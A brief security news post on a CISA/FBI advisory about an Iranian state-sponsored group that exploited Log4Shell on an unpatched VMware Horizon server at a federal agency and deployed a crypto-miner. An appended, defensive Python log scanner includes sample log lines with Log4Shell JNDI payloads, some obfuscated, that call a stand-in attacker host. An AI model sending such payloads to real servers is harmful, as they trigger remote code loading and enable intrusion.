Iranian APT Pwns FCEB Using Log4Shell

CISA and the FBI yesterday released a joint advisory warning of an unnamed Iranian government-sponsored APT that breached a Federal Civilian Executive Branch (FCEB) organization and deployed XMRig crypto-mining malware. The actor got into the federal network by exploiting the Log4Shell remote code execution vulnerability on an unpatched VMware Horizon server.

Yaron Kassner, CTO and Co-Founder of Silverfort, had this to say:

“The alert from CISA is evidence of the unfortunate legacy we were warned to expect from Log4Shell at the time of its discovery. It is a gift to state actors and access brokers, and this attack is proof of the impact critical vulnerabilities such as this can have when left unpatched. As we see here, once a toehold is gained, attackers are then able to simply pick up administrator credentials and use them to move laterally, before eventually compromising the entire domain.”

“This emphasizes the need for MFA inside the network, which was clearly missing here. Hopefully, crypto-mining was the sole outcome of this attack and not more than that.”

The take-home message is that if you haven’t got your exposure to the Log4Shell vulnerability under control, you will get pwned. So set about making sure that you’re not the next victim of a threat actor taking advantage of Log4Shell.
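One defender-side check in the spirit of that advice, written here as an added example that is not part of the original post or of the CISA/FBI advisory: it scans web-server access-log lines for Log4Shell-style JNDI lookup strings, undoing URL encoding and the nested-lookup tricks (`${lower:j}`, `${::-j}`) that are commonly used to hide the literal `jndi`. The log lines, IP addresses and hostnames are constructed placeholders.

```python
import re
import urllib.parse

# Constructed sample access-log lines (not from the advisory); hosts/IPs are placeholders.
SAMPLE_LOG = """\
10.0.0.5 - - [17/Nov/2022:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [17/Nov/2022:10:01:07 +0000] "GET /portal/ HTTP/1.1" 200 1024 "-" "${jndi:ldap://lookup.attacker.example/a}"
10.0.0.9 - - [17/Nov/2022:10:01:09 +0000] "GET /portal/?q=%24%7B%24%7Blower%3Aj%7Dndi%3Armi%3A%2F%2Flookup.attacker.example%2Fa%7D HTTP/1.1" 404 0 "-" "curl/7.68.0"
10.0.0.7 - - [17/Nov/2022:10:02:00 +0000] "GET /health HTTP/1.1" 200 2 "-" "${env:HOSTNAME}"
"""

# Inner lookups that evaluate to a single literal: ${lower:j}, ${upper:N}, ${::-j}
OBFUSCATION = re.compile(
    r"\$\{\s*(?:lower|upper)\s*:\s*([^${}]*?)\s*\}"   # ${lower:x} / ${upper:x} -> x
    r"|\$\{\s*:+\s*-\s*([^${}]*?)\s*\}",              # ${::-x} (default-value form) -> x
    re.I,
)
# The lookup that triggers the outbound JNDI fetch; the scheme is captured for reporting.
JNDI = re.compile(r"\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns|iiop|corba|nds|http)", re.I)


def normalize(s: str) -> str:
    """URL-decode and collapse obfuscating inner lookups until the string stops changing."""
    prev = None
    while s != prev:
        prev = s
        s = urllib.parse.unquote(s)
        s = OBFUSCATION.sub(lambda m: m.group(1) if m.group(1) is not None else m.group(2), s)
    return s


def scan(log_text: str) -> list[dict]:
    """Return one record per log line that contains a (de-obfuscated) JNDI lookup."""
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        m = JNDI.search(normalize(line))
        if m:
            hits.append({"line": lineno, "scheme": m.group(1).lower(), "src": line.split()[0]})
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f"line {hit['line']}: JNDI lookup via {hit['scheme']} from {hit['src']}")
```

Plain `${...}` lookups that are not JNDI (the `${env:HOSTNAME}` line) are deliberately left alone so the check does not fire on every Log4j substitution string.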
